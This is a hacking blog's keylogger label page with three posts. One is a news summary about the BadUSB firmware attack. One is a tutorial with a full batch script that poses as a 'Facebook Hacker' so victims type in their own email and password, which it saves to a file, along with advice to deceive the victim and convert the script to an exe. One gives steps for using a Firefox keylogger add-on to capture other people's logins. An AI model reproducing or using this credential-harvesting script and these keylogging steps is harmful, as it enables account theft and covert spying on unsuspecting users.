Ofer For You (1)

Showing posts with label keylogger. Show all posts
Showing posts with label keylogger. Show all posts

Monday, 6 October 2014

Malware Turning USB into undetectable Cyber Weapons






BadUSB Malware Code Released — Turn USB Drives Into Undetectable CyberWeapons

Once again USB has come up as a major threat to a vast number of users who use USB drives – including USB sticks and keyboards. Security researchers have released a bunch of hacking tools that can be used to convert USB drive into silent malware installer.

This vulnerability has come about to be known as "BadUSB", whose source code has been published by the researchers on the open source code hosting website Github, demanding manufacturers either to beef up protections for USB flash drive firmware and fix the problem or leave hundreds of millions of users vulnerable to the attack.

The code released by researchers Adam Caudill and Brandon Wilson has capability to spread itself by hiding in the firmware meant to control the ways in which USB devices connect to computers. The hack utilizes the security flaw in the USB that allows an attacker to insert malicious code into their firmware.

But Wait! What this means is that this critical vulnerability is now available online for hackers, cyber criminals and everybody to use so as to infect as many computers as they want.

SOURCE CODE AVAILABLE ONLINE TO EVERYBODY
In a talk at the Derbycon Hacker Conference in Louisville last week, the duo were able to reverse engineer the USB firmware, infect it with their own code, and essentially hijack the associated device. The researchers also underlined the danger of the Bad USB hack by going in-depth of the code.

The security hole was first revealed by researchers from Berlin-based Security Research Labs (SRLabs in Germany) at the Black Hat security conference in Las Vegas two months ago, and here you can watch the video of their presentation. The German researchers didn’t publish their source code because they thought it to be dangerous and too hard to patch.
We really hope that releasing this will push device manufactures to insist on signed firmware updates, and that Phison will add support for signed updates to all of the controllers it sells,” Caudill said in a blog post. “Phison isn’t the only player here, though they are the most common—I’d love to see them take the lead in improving security for these devices.
THE GOOD NEWS AND THE BAD
The good news is that this vulnerability presents in only one USB manufacturer Phison electronics, a Taiwanese electronics company. But the bad side of it is that Phison USB sticks can infect any given device they are plugged into, and the company has not yet revealed who it manufactures USB sticks for. This is the fact it is still unclear as to how widespread the problem may be at the moment.

A Phison USB stick can infect any type of computer, but it isn’t clear if its able to infect any other USB device that is plugged into them afterwards or not. However, Phison controllers are found in a very large number of USB thumb drives available on the market.



Bad USB VULNERABILITY IS UNPATCHABLE
The flaw in USB basically modifies the firmware of USB devices, which can easily be done from inside the operating system, and hides the malware in USB devices in a way that it become almost impossible to detect it. The flaw goes worst when complete formatting or deleting the contents of a USB device wouldn't vanish the malicious code, since its embedded in the firmware.

According to Wired, the vulnerability is "practically unpatchable" because it exploits "the very way that USB is designed." Once infected, each USB device will infect anything it's connected to, or any new USB stick coming into it.

IMPACT OF BadUSB ATTACK
Once compromised, the USB devices can reportedly:
  • enter keystrokes
  • alter files
  • affect Internet activity
  • infect other systems, as well, and then spread to additional USB devices
  • spoofs a network card and change the computer’s DNS setting to redirect traffic
  • emulates a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware
During their Derbycon demonstration, the two researchers replicated the emulated keyboard attack, but also showed how to create a hidden partition on thumb drives to defeat forensic tools and how to bypass the password for protected partitions on some USB drives that provide such a feature.

MANUFACTURER DENIES THE PROBLEM
Security researchers tried to contact Phison electronics, the manufacturer of the vulnerable USB devices, but the company "repeatedly denied that the attack was possible."

By "Kunal Vohra", Director@H2K
Still Having Problem..!!! Connect with Admin
BBM: 7F72A48D

 Kunal Vohra
Download Our Official Android App & Get Free Internet



"The Hackers Street"

For Daily Updates 


Sunday, 13 July 2014

How To Make Your Own Keylogger

Here is the one of favourite trick byu the admin Kunal Vohra 

"How to Make a keylogger of your own"


So how to Create your own simple keylogger to hack every account like Facebook, Gmail, Yahoo etc..

You can create it using Notepad, and the only work u have to do just install that keylogger on him/her
PC and tell them that this is a Facebook Hacker when they type there Email And Password in it and you will get the Password from their PC.
Now start:-
(Facebook Hacker)

1. Create a folder named "Hacker" in C: drive in your computer (do not use quotes)

2. Copy the following codes and paste it in notepad and save it as BATCH file (extension)is .bat .
 ex: anyname.bat

@echo off
color a
title Facebook Hacking :Login:
cls
echo Please Enter Your Facebook Email Adress And Password
echo To Hack Any Facebook Account
echo.
echo.
cd "C:\Hacker"
set /p user=Email ID:
set /p pass=Password:
echo Username="%user%" Password="%pass%">hACKED.txt
echo.
echo.
echo Press any key to continue
pause >n
echo Loading.....
echo.
echo.
echo Enter E-Mail Id Of Victim
set /p user=Email ID:
echo Username="%user%">Victim.txt
echo.
echo Press any key to hack this ID
echo.
echo.
pause >
echo.
echo Processing...
echo.
echo.
echo.
echo.
echo.
pause >n

3.SAVE it in notepad as .bat file. (at anywhere SAY - Desktop).
4.Now open the that file
5.it will ask for your Facebook Email ID and Password.
Enter Email ID and Password in it.
6. Now it will ask for Victim EMAIL ID
Enter any ID( SAY - 111111@ ds.com).
7. After completing this go to that Folder that you created earlier named Hacker
open this folder.
Automatically you will get the Email IDs and Password in TEXT file.

NOTE : To convert these bat files to exe, use this .bat to .exe converter tool



That's all :)


Still Having Problem..!!! Connect with Admin Kunal Vohra

Download Our Official Android App & Get Free Internet*

"The Hackers Street"

For Daily Updates

Use Mozilla as A KeyLogger


Hello friends today your admin Kunal Vohra back with a ultimate trick... how to use Mozilla firefox as keylogger.

Here is the simple procedure:

Steps:

1] Open your Mozilla Firefox browser and Google for key-logger 1.6 add-on for your Firefox browser.

or click on this link if you are using Firefox browser right now


2] Download the add-on and install it on your Firefox browser.

Now for the first time it will ask you to set a password for it. And after setting up a password for it go to any such websites where you can log in. For example, www.gmail.com or www.facebook.com or any such site.


Now to view the keystrokes that were recorded, press Alt + L. Now it will ask you the password. Enter the password and now just view the key-strokes.


Still Having Problem..!!! Connect with Admin Kunal Vohra
Download Our Official Android App & Get Free Internet
"The Hackers Street"
For Daily Updates